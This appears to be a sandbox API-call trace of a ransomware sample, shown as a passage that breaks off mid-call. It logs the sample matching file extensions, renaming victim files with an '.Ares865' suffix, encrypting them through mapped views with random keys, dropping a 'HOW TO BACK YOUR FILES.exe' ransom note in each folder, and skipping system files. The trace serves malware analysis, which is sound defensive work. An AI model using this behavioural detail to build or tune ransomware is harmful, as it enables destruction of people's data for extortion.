[0089.472] lstrlenW (lpString="nv") returned 2 [0089.472] lstrcmpiW (lpString1="co", lpString2="nv") returned -1 [0089.472] lstrlenW (lpString="nv2") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="nv2") returned -1 [0089.472] lstrlenW (lpString="nwdb") returned 4 [0089.472] lstrcmpiW (lpString1=".ico", lpString2="nwdb") returned -1 [0089.472] lstrlenW (lpString="nyf") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="nyf") returned -1 [0089.472] lstrlenW (lpString="odb") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.472] lstrlenW (lpString="odb") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="odb") returned -1 [0089.472] lstrlenW (lpString="oqy") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="oqy") returned -1 [0089.472] lstrlenW (lpString="ora") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="ora") returned -1 [0089.472] lstrlenW (lpString="orx") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="orx") returned -1 [0089.472] lstrlenW (lpString="owc") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="owc") returned -1 [0089.472] lstrlenW (lpString="p96") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="p96") returned -1 [0089.472] lstrlenW (lpString="p97") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="p97") returned -1 [0089.472] lstrlenW (lpString="pan") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="pan") returned -1 [0089.472] lstrlenW (lpString="pdb") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="pdb") returned -1 [0089.472] lstrlenW (lpString="pdm") returned 3 [0089.472] lstrcmpiW (lpString1="ico", lpString2="pdm") returned -1 [0089.473] lstrlenW (lpString="pnz") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="pnz") returned -1 [0089.473] lstrlenW (lpString="qry") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="qry") returned -1 [0089.473] lstrlenW (lpString="qvd") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="qvd") returned -1 [0089.473] lstrlenW (lpString="rbf") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="rbf") returned -1 [0089.473] lstrlenW (lpString="rctd") returned 4 [0089.473] lstrcmpiW (lpString1=".ico", lpString2="rctd") returned -1 [0089.473] lstrlenW (lpString="rod") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="rod") returned -1 [0089.473] lstrlenW (lpString="rodx") returned 4 [0089.473] lstrcmpiW (lpString1=".ico", lpString2="rodx") returned -1 [0089.473] lstrlenW (lpString="rpd") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="rpd") returned -1 [0089.473] lstrlenW (lpString="rsd") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="rsd") returned -1 [0089.473] lstrlenW (lpString="sas7bdat") returned 8 [0089.473] lstrlenW (lpString="sbf") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="sbf") returned -1 [0089.473] lstrlenW (lpString="scx") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="scx") returned -1 [0089.473] lstrlenW (lpString="sdb") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="sdb") returned -1 [0089.473] lstrlenW (lpString="sdc") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="sdc") returned -1 [0089.473] lstrlenW (lpString="sdf") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="sdf") returned -1 [0089.473] lstrlenW (lpString="sis") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="sis") returned -1 [0089.473] lstrlenW (lpString="spq") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="spq") returned -1 [0089.473] lstrlenW (lpString="te") returned 2 [0089.473] lstrcmpiW (lpString1="co", lpString2="te") returned -1 [0089.473] lstrlenW (lpString="teacher") returned 7 [0089.473] lstrlenW (lpString="tmd") returned 3 [0089.473] lstrcmpiW (lpString1="ico", lpString2="tmd") returned -1 [0089.473] lstrlenW (lpString="tps") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="tps") returned -1 [0089.474] lstrlenW (lpString="trc") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.474] lstrlenW (lpString="trc") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="trc") returned -1 [0089.474] lstrlenW (lpString="trm") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="trm") returned -1 [0089.474] lstrlenW (lpString="udb") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="udb") returned -1 [0089.474] lstrlenW (lpString="udl") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="udl") returned -1 [0089.474] lstrlenW (lpString="usr") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="usr") returned -1 [0089.474] lstrlenW (lpString="v12") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="v12") returned -1 [0089.474] lstrlenW (lpString="vis") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="vis") returned -1 [0089.474] lstrlenW (lpString="vpd") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="vpd") returned -1 [0089.474] lstrlenW (lpString="vvv") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="vvv") returned -1 [0089.474] lstrlenW (lpString="wdb") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="wdb") returned -1 [0089.474] lstrlenW (lpString="wmdb") returned 4 [0089.474] lstrcmpiW (lpString1=".ico", lpString2="wmdb") returned -1 [0089.474] lstrlenW (lpString="wrk") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="wrk") returned -1 [0089.474] lstrlenW (lpString="xdb") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="xdb") returned -1 [0089.474] lstrlenW (lpString="xld") returned 3 [0089.474] lstrcmpiW (lpString1="ico", lpString2="xld") returned -1 [0089.474] lstrlenW (lpString="xmlff") returned 5 [0089.474] lstrcmpiW (lpString1="p.ico", lpString2="xmlff") returned -1 [0089.474] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.Ares865") returned 101 [0089.474] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.ares865"), dwFlags=0x1) returned 1 [0089.475] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.Ares865" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0089.476] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=113140) returned 1 [0089.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0089.476] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0089.477] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0089.477] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0089.477] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0089.477] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.478] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1bd00, lpName=0x0) returned 0x15c [0089.479] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1bd00) returned 0x190000 [0089.485] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0089.486] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0089.486] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0089.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0089.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0089.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0089.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0089.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0089.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0089.486] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0089.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0089.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0089.486] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0089.486] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0089.488] CloseHandle (hObject=0x15c) returned 1 [0089.488] CloseHandle (hObject=0x118) returned 1 [0089.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0089.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0089.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0089.488] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2d64214, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2d64214, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x7c219ec7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wmp.ico", cAlternateFileName="")) returned 0 [0089.488] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.488] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b50 [0089.488] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0089.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2fc8 | out: hHeap=0x2b0000) returned 1 [0089.488] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0089.488] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned 91 [0089.489] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" [0089.489] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.489] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.489] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.489] GetLastError () returned 0x0 [0089.489] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.489] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.490] CloseHandle (hObject=0x120) returned 1 [0089.490] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.490] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.490] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.490] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.490] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.490] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.490] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.490] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.490] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.490] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.490] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.490] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c7feae0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.490] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.490] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resource.xml.Ares865", cAlternateFileName="")) returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="aoldtz.exe") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2=".") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="..") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="windows") returned -1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="bootmgr") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="temp") returned -1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="pagefile.sys") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="boot") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ids.txt") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="ntuser.dat") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="perflogs") returned 1 [0089.490] lstrcmpiW (lpString1="resource.xml.Ares865", lpString2="MSBuild") returned 1 [0089.490] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.490] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*") returned 93 [0089.490] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="resource.xml.Ares865" | out: lpString1="resource.xml.Ares865") returned="resource.xml.Ares865" [0089.491] lstrlenW (lpString="resource.xml.Ares865") returned 20 [0089.491] lstrlenW (lpString="Ares865") returned 7 [0089.491] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0089.491] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x932b6af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x95b44f8, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x840, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="resource.xml.Ares865", cAlternateFileName="")) returned 0 [0089.491] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0089.491] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b10 [0089.491] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0089.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0089.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0089.491] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned 48 [0089.491] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device" [0089.491] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0089.491] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\how to back your files.exe"), bFailIfExists=1) returned 0 [0089.492] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0089.492] GetLastError () returned 0x0 [0089.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0089.492] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0089.492] CloseHandle (hObject=0x120) returned 1 [0089.492] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0089.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0089.492] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0089.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0089.492] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0089.492] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c7feae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.492] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.492] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0089.492] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0089.492] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0089.492] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c7feae0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c7feae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0089.492] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0089.493] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c84ada0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c84ada0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{113527a4-45d4-4b6f-b567-97838f1b04b0}", cAlternateFileName="{11352~1")) returned 1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="aoldtz.exe") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2=".") returned 1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="..") returned 1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="windows") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="bootmgr") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="temp") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="pagefile.sys") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="boot") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="ids.txt") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="ntuser.dat") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="perflogs") returned -1 [0089.493] lstrcmpiW (lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpString2="MSBuild") returned -1 [0089.493] lstrlenW (lpString="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned 38 [0089.493] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*") returned 50 [0089.493] lstrcpyW (in: lpString1=0x2cce462, lpString2="{113527a4-45d4-4b6f-b567-97838f1b04b0}" | out: lpString1="{113527a4-45d4-4b6f-b567-97838f1b04b0}") returned="{113527a4-45d4-4b6f-b567-97838f1b04b0}" [0089.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b08 [0089.493] RtlAllocateHeap 